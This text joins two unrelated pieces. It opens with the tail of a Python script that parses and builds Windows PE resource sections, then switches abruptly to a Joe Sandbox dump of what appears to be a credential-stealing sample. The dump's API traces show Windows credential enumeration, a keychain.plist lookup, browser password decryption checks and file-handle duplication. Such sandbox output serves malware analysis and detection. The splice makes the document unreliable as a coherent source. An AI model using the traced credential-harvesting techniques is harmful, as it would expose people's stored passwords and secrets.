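RES_DATA = struct.Struct("<IIII")     # IMAGE_RESOURCE_DATA_ENTRY, 16 bytes
HIGH_BIT = 0x80000000                 # set: offset points at a subdirectory / a name string

RESOURCE_TYPE = "BIN"                 # lpType from the listing
RESOURCE_ID = 0x32                    # lpName from the listing (MAKEINTRESOURCE(50))


def _entry_name(rsrc, name_field):
    """Integer ID, or the string of an IMAGE_RESOURCE_DIR_STRING_U (Length + UTF-16 chars)."""
    if name_field & HIGH_BIT:
        off = name_field & ~HIGH_BIT
        (length,) = struct.unpack_from("<H", rsrc, off)
        return rsrc[off + 2: off + 2 + 2 * length].decode("utf-16-le")
    return name_field


def _entries(rsrc, dir_off):
    """Yield (name_or_id, offset_field) for every entry of the directory at dir_off."""
    _chars, _time, _maj, _min, n_named, n_id = RES_DIR.unpack_from(rsrc, dir_off)
    for i in range(n_named + n_id):
        name, off = RES_ENTRY.unpack_from(rsrc, dir_off + RES_DIR.size + i * RES_ENTRY.size)
        yield _entry_name(rsrc, name), off


def find_resource(rsrc, rsrc_rva, res_type, res_name, lang=None):
    """FindResourceW semantics on raw section bytes: string names compare
    case-insensitively, integer IDs exactly; the first language wins unless one
    is given. Returns the bytes LockResource would expose, or None."""
    def match(wanted, got):
        if isinstance(wanted, str) and isinstance(got, str):
            return wanted.lower() == got.lower()
        return wanted == got

    for t, t_off in _entries(rsrc, 0):
        if not match(res_type, t) or not t_off & HIGH_BIT:
            continue
        for n, n_off in _entries(rsrc, t_off & ~HIGH_BIT):
            if not match(res_name, n) or not n_off & HIGH_BIT:
                continue
            for l, d_off in _entries(rsrc, n_off & ~HIGH_BIT):
                if lang is not None and l != lang:
                    continue
                data_rva, size, _cp, _res = RES_DATA.unpack_from(rsrc, d_off & ~HIGH_BIT)
                off = data_rva - rsrc_rva            # data RVA -> offset inside the section
                return bytes(rsrc[off: off + size])  # SizeofResource bytes, as memcpy'd
    return None


def build_rsrc(rsrc_rva, res_type, res_name, payload, lang=0x409):
    """Constructed .rsrc with a single resource: root -> type (named) -> name (ID) -> lang -> data."""
    root, tdir, ndir, dent, sname = 0x00, 0x18, 0x30, 0x48, 0x58
    name_u = res_type.encode("utf-16-le")
    data = sname + 2 + len(name_u)
    blob = bytearray(data + len(payload))
    RES_DIR.pack_into(blob, root, 0, 0, 0, 0, 1, 0)                      # 1 named entry
    RES_ENTRY.pack_into(blob, root + RES_DIR.size, HIGH_BIT | sname, HIGH_BIT | tdir)
    RES_DIR.pack_into(blob, tdir, 0, 0, 0, 0, 0, 1)                      # 1 ID entry
    RES_ENTRY.pack_into(blob, tdir + RES_DIR.size, res_name, HIGH_BIT | ndir)
    RES_DIR.pack_into(blob, ndir, 0, 0, 0, 0, 0, 1)                      # 1 language entry
    RES_ENTRY.pack_into(blob, ndir + RES_DIR.size, lang, dent)           # leaf: no HIGH_BIT
    RES_DATA.pack_into(blob, dent, rsrc_rva + data, len(payload), 0, 0)
    struct.pack_into("<H", blob, sname, len(res_type))
    blob[sname + 2: sname + 2 + len(name_u)] = name_u
    blob[data:] = payload
    return bytes(blob)


if __name__ == "__main__":
    rsrc = build_rsrc(0x1A000, RESOURCE_TYPE, RESOURCE_ID, b"constructed resource payload")
    print(find_resource(rsrc, 0x1A000, RESOURCE_TYPE, RESOURCE_ID))
```

Against a real dump, pass the bytes of the .rsrc section and its VirtualAddress from the section table; the data entry's OffsetToData is an RVA, so the subtraction of the section RVA is what turns it into an offset within those bytes.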
                                                                            APIs
                                                                            • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                            • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$FirstNext
                                                                            • String ID:
                                                                            • API String ID: 1690352074-0
                                                                            • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                            • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                            • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                            • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0041898C
                                                                            • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: InfoSystemmemset
                                                                            • String ID:
                                                                            • API String ID: 3558857096-0
                                                                            • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                            • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                            • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                            • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                            Control-flow Graph

                                                                            control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 39 44558e-445594 call 444b06 4->39 40 44557e-44558c call 4136c0 call 41366b 4->40 19 4455e5 5->19 20 4455e8-4455f9 5->20 8 445800-445809 6->8 12 445856-44585f 8->12 13 44580b-44581e call 40a889 call 403e2d 8->13 16 445861-445874 call 40a889 call 403c9c 12->16 17 4458ac-4458b5 12->17 42 445823-445826 13->42 51 445879-44587c 16->51 21 44594f-445958 17->21 22 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 17->22 19->20 23 445672-445683 call 40a889 call 403fbe 20->23 24 4455fb-445601 20->24 35 4459f2-4459fa 21->35 36 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 21->36 135 44592d-445945 call 40b6ef 22->135 136 44594a 22->136 85 445685 23->85 86 4456b2-4456b5 call 40b1ab 23->86 29 445605-445607 24->29 30 445603 24->30 29->23 38 445609-44560d 29->38 30->29 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 35->44 45 445b29-445b32 35->45 153 4459d0-4459e8 call 40b6ef 36->153 154 4459ed 36->154 38->23 49 44560f-445641 call 4087b3 call 40a889 call 4454bf 38->49 39->3 40->39 52 44584c-445854 call 40b1ab 42->52 53 445828 42->53 182 445b08-445b15 call 40ae51 44->182 54 445c7c-445c85 45->54 55 445b38-445b96 memset * 3 45->55 150 445665-445670 call 40b1ab 49->150 151 445643-445663 call 40a9b5 call 4087b3 49->151 65 4458a2-4458aa call 40b1ab 51->65 66 44587e 51->66 52->12 67 44582e-445847 call 40a9b5 call 4087b3 53->67 61 445d1c-445d25 54->61 62 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 54->62 68 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 55->68 69 445b98-445ba0 55->69 74 445fae-445fb2 61->74 75 445d2b-445d3b 61->75 168 
445cf5 62->168 169 445cfc-445d03 62->169 65->17 83 445884-44589d call 40a9b5 call 4087b3 66->83 138 445849 67->138 249 445c77 68->249 69->68 84 445ba2-445bcf call 4099c6 call 445403 call 445389 69->84 91 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 75->91 92 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 75->92 156 44589f 83->156 84->54 101 44568b-4456a4 call 40a9b5 call 4087b3 85->101 105 4456ba-4456c4 86->105 162 445d67-445d6c 91->162 163 445d71-445d83 call 445093 91->163 196 445e17 92->196 197 445e1e-445e25 92->197 158 4456a9-4456b0 101->158 118 4457f9 105->118 119 4456ca-4456d3 call 413cfa call 413d4c 105->119 118->6 172 4456d8-4456f7 call 40b2cc call 413fa6 119->172 135->136 136->21 138->52 150->105 151->150 153->154 154->35 156->65 158->86 158->101 174 445fa1-445fa9 call 40b6ef 162->174 163->74 168->169 179 445d05-445d13 169->179 180 445d17 169->180 206 4456fd-445796 memset * 4 call 409c70 * 3 172->206 207 4457ea-4457f7 call 413d29 172->207 174->74 179->180 180->61 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 206->207 248 445798-4457ca call 40b2cc call 409d1f call 409b98 206->248 207->8 218->74 253 445f9b 218->253 219->182 242->203 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->245 243->242 264 445f4d-445f5a call 40ae51 245->264 248->207 265 4457cc-4457e5 call 4087b3 248->265 249->54 253->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004455C2
                                                                            • wcsrchr.MSVCRT ref: 004455DA
                                                                            • memset.MSVCRT ref: 0044570D
                                                                            • memset.MSVCRT ref: 00445725
                                                                              • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                              • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                              • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                              • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                              • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                              • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                              • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                              • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                            • memset.MSVCRT ref: 0044573D
                                                                            • memset.MSVCRT ref: 00445755
                                                                            • memset.MSVCRT ref: 004458CB
                                                                            • memset.MSVCRT ref: 004458E3
                                                                            • memset.MSVCRT ref: 0044596E
                                                                            • memset.MSVCRT ref: 00445A10
                                                                            • memset.MSVCRT ref: 00445A28
                                                                            • memset.MSVCRT ref: 00445AC6
                                                                              • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                              • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                              • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                              • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                              • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                            • memset.MSVCRT ref: 00445B52
                                                                            • memset.MSVCRT ref: 00445B6A
                                                                            • memset.MSVCRT ref: 00445C9B
                                                                            • memset.MSVCRT ref: 00445CB3
                                                                            • _wcsicmp.MSVCRT ref: 00445D56
                                                                            • memset.MSVCRT ref: 00445B82
                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                              • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                            • memset.MSVCRT ref: 00445986
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                            • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                            • API String ID: 2263259095-3798722523
                                                                            • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                            • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                            • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                            • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                              • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                              • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                              • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                            • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                            • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                            • String ID: $/deleteregkey$/savelangfile
                                                                            • API String ID: 2744995895-28296030
                                                                            • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                            • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                            • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                            • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040B71C
                                                                              • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                              • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                            • wcsrchr.MSVCRT ref: 0040B738
                                                                            • memset.MSVCRT ref: 0040B756
                                                                            • memset.MSVCRT ref: 0040B7F5
                                                                            • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                            • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                            • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                            • memset.MSVCRT ref: 0040B851
                                                                            • memset.MSVCRT ref: 0040B8CA
                                                                            • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                              • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                              • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                            • memset.MSVCRT ref: 0040BB53
                                                                            • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                            • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateDeleteHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                            • String ID: chp$v10
                                                                            • API String ID: 4165125987-2783969131
                                                                            • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                            • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                            • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                            • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                            Control-flow Graph

                                                                            control_flow_graph 504 4091b8-40921b memset call 40a6e6 call 444432 509 409520-409526 504->509 510 409221-40923b call 40b273 call 438552 504->510 514 409240-409248 510->514 515 409383-4093ab call 40b273 call 438552 514->515 516 40924e-409258 call 4251c4 514->516 528 4093b1 515->528 529 4094ff-40950b call 443d90 515->529 521 40937b-40937e call 424f26 516->521 522 40925e-409291 call 4253cf * 2 call 4253af * 2 516->522 521->515 522->521 552 409297-409299 522->552 532 4093d3-4093dd call 4251c4 528->532 529->509 538 40950d-409511 529->538 539 4093b3-4093cc call 4253cf * 2 532->539 540 4093df 532->540 538->509 542 409513-40951d call 408f2f 538->542 539->532 555 4093ce-4093d1 539->555 543 4094f7-4094fa call 424f26 540->543 542->509 543->529 552->521 554 40929f-4092a3 552->554 554->521 556 4092a9-4092ba 554->556 555->532 557 4093e4-4093fb call 4253af * 2 555->557 558 4092bc 556->558 559 4092be-4092e3 memcpy memcmp 556->559 557->543 569 409401-409403 557->569 558->559 560 409333-409345 memcmp 559->560 561 4092e5-4092ec 559->561 560->521 564 409347-40935f memcpy 560->564 561->521 563 4092f2-409331 memcpy * 2 561->563 566 409363-409378 memcpy 563->566 564->566 566->521 569->543 570 409409-40941b memcmp 569->570 570->543 571 409421-409433 memcmp 570->571 572 4094a4-4094b6 memcmp 571->572 573 409435-40943c 571->573 572->543 575 4094b8-4094ed memcpy * 2 572->575 573->543 574 409442-4094a2 memcpy * 3 573->574 576 4094f4 574->576 575->576 576->543
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004091E2
                                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                            • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                            • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                            • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                            • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                            • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                            • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                            • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                            • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                            • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                            • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                            • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                            • String ID:
                                                                            • API String ID: 3715365532-3916222277
                                                                            • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                            • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                            • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                            • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                              • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                              • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                              • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                              • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                              • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                            • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                            • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                            • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                            • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                              • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                              • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                              • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                              • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                            • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                            • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                            • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                            • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                            • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                            • String ID: bhv
                                                                            • API String ID: 4234240956-2689659898
                                                                            • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                            • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                            • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                            • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                            Control-flow Graph

                                                                            control_flow_graph 633 413f4f-413f52 634 413fa5 633->634 635 413f54-413f5a call 40a804 633->635 637 413f5f-413fa4 GetProcAddress * 5 635->637 637->634
                                                                            APIs
                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                            • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                            • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                            • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                            • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                            • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                            • API String ID: 2941347001-70141382
                                                                            • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                            • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                            • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                            • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                                            Control-flow Graph
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                            • String ID:
                                                                            • API String ID: 2827331108-0
                                                                            • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                            • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                            • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                            • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040C298
                                                                              • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                              • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
